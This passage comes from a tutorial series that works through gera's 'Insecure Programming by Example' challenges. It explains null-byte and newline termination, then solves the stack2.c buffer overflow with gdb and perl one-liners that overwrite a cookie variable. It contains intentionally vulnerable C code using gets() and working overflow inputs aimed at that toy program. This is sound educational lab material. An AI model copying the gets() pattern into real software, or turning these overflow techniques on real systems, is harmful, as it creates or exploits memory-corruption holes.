Now, on to why this one was so easy and conceptually no different from the prior challenge. I believe gera was trying to teach us to be aware of null-byte termination of strings within memory. Basically, a lot of string functions from the ANSI C standard do whatever it is they are supposed to do until they hit a null-byte (null being 0x00), and most strings in memory are terminated using null-bytes because of this. The most infamous example of a function that uses null-bytes is strcpy() from string.h. The thing is, gets() does not terminate on a null-byte; instead it stops reading at a newline (0x0A) or at end-of-file (which is a condition on the input stream rather than a character; typing Ctrl-D, 0x04, at a terminal is just one way to signal it). It will be important to know how the heck functions terminate input in upcoming examples in the stackN.c series and also in the further-along aboN.c series (which I have not yet completed). I thought it was important to explore why this one was so easy though, and to give the reader some food for thought as to how this might affect them in the future.
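
To see the difference without actually calling the unsafe functions, here is a small sketch that only models where each kind of function would stop. The function and array names are made up for illustration; the stack3 bytes are the ones from the perl command above, and the other array is the stack4 cookie 0x000d0a00 laid out least significant byte first.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The cookie bytes sent for stack3, followed by the newline. */
static const unsigned char stack3_input[] = { 0x05, 0x00, 0x02, 0x01, 0x0a };

/* The stack4 cookie 0x000d0a00 in little-endian order. */
static const unsigned char stack4_cookie[] = { 0x00, 0x0a, 0x0d, 0x00 };

/* Model of strcpy(): how many bytes are taken before the first 0x00. */
size_t taken_until_nul(const unsigned char *in, size_t len)
{
    assert(in != NULL);
    const unsigned char *p = memchr(in, 0x00, len);
    return p ? (size_t)(p - in) : len;
}

/* Model of gets(): how many bytes are taken before the first 0x0a. */
size_t taken_until_newline(const unsigned char *in, size_t len)
{
    assert(in != NULL);
    const unsigned char *p = memchr(in, 0x0a, len);
    return p ? (size_t)(p - in) : len;
}
```

For stack3_input, the strcpy() model stops after 1 byte while the gets() model takes all 4 cookie bytes, which is why this challenge falls over so easily. For stack4_cookie the gets() model stops after a single byte, so that cookie can't be delivered the same way.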

There will be more exploration of values that terminate our gets() function prematurely in upcoming articles, in the meantime, thanks for reading :-).

Insecure Programming by Example – gdb debugging & stack2.c

This post will be less detailed than the previous one, mainly because most of the concepts are identical.

Here is Insecure Programming by Example stack2.c:

/* stack2-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x01020305)
  		printf("you win!\n");
}

As you can see, the only real change is the value of the cookie variable. Seems simple enough, right? We can just send the program “5321” and be done with it! Of course, there is a reason gera wrote this almost-identical challenge, which will become apparent shortly. Let’s compile it and try to feed it the “5321” string, and see what happens.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack2 stack2.c
/tmp/cc5NHEBj.o: In function `main':
/home/mishley/InsecureProgramming/stack2.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack2
buf: bffffa00 cookie: bffffa50
JUNKLETSEXIT
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321";' | ./stack2
buf: bffffa00 cookie: bffffa50
Segmentation fault

OK, this is odd. We clearly overflowed the buffer, because the program segfaulted, which means we clobbered the saved return address (or something else important) in main()’s stack frame. But we didn’t get the “you win!” message we expected. Like I said, things are not always this easy, and there is a good reason gera wrote this challenge. Now is the time to bring in a debugger and see why we are having trouble. We will use GDB as our debugger of choice. It is adequate to this task, though for more complicated exploitation on other platforms (e.g., Windows) a GUI-based debugger like OllyDbg or Immunity Debugger might be preferred.

Using a debugger allows us to step through the execution of the code at the CPU (assembly language) level and examine the state of the program at breakpoints we set. Think of a breakpoint as the pause button in your favorite video game: while the game is paused you can examine your inventory and statistics, change equipment, etc. Likewise, while execution is paused in a debugger you can examine the registers, stack traces and frames, and the contents of memory itself.

It would probably be good at this point for the reader to become familiar with the basics of how a computer works (we’re talking Von Neumann machines here, of the x86 variety ;-)). I couldn’t find a really good explanation on short notice, but there are a couple of good books on the subject. Various parts of “Hacking: The Art of Exploitation” by Jon Erickson and “Gray Hat Hacking: The Ethical Hacker’s Handbook” by various authors cover this in multiple places. The best intro I own, which is probably more in-depth than anyone but a CE/EE cares to know, is “Inside the Machine” by Jon Stokes. If you are looking for something you can read online for free, there is a GREAT book by Jonathan Bartlett called “Programming from the Ground Up” that covers all of the needed basics, including teaching the reader how to write real programs in pure assembly. Best of all, it can be read online or downloaded for free, and is available from online booksellers for a reasonable price. I personally bought the book after using the online edition a lot, because he did a great job.

With that said, let’s use our debugger to examine the state of the program right after gets() returns and see why the heck we didn’t get our “you win!” love from the program.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321\n";'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5321
debian5:/home/mishley/InsecureProgramming# gdb -q ./stack2
(gdb) list
1	/* stack2-stdin.c                               *
2	 * specially crafted to feed your brain by gera */
3
4	#include <stdio.h>
5
6	int main() {
7		int cookie;
8		char buf[80];
9
10		printf("buf: %08x cookie: %08x\n", &buf, &cookie);
(gdb) list
11		gets(buf);
12
13		if (cookie == 0x01020305)
14	  		printf("you win!\n");
15	}
(gdb) break 13
Breakpoint 1 at 0x804843a: file stack2.c, line 13.
(gdb) run
Starting program: /home/mishley/InsecureProgramming/stack2
buf: bffff9d0 cookie: bffffa20
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5321

Breakpoint 1, main () at stack2.c:13
13		if (cookie == 0x01020305)
(gdb) x/x &cookie
0xbffffa20:	0x31323335
(gdb) quit
The program is running.  Exit anyway? (y or n) y

What the output of x/x &cookie shows is that the cookie variable holds 0x31323335, which is the byte sequence 0x35 0x33 0x32 0x31 in memory (remember your endianness). Which is curious, since we specified “5321” in our print statement…what could be happening here? The answer is that we are not passing the numeric values 5, 3, 2, and 1 via the print statement; we are passing the ASCII codes for the characters “5321”, which sure enough are 0x35, 0x33, 0x32, and 0x31. So what we need is an easy way to emit arbitrary byte values from Perl’s print statement. The easiest way is to use hex escapes, so that we print exactly the raw bytes we specify. Here is an example with the problem we have faced in this article solved.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x03\x02\x01\n";' | ./stack2
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

By using Perl’s \xNN escapes we can send raw bytes to the STDIN of the stack2 program, overwrite the cookie variable through the stack buffer overflow, and win the game! I hope folks are finding these articles informative. I know I am learning a lot by having to write it all out.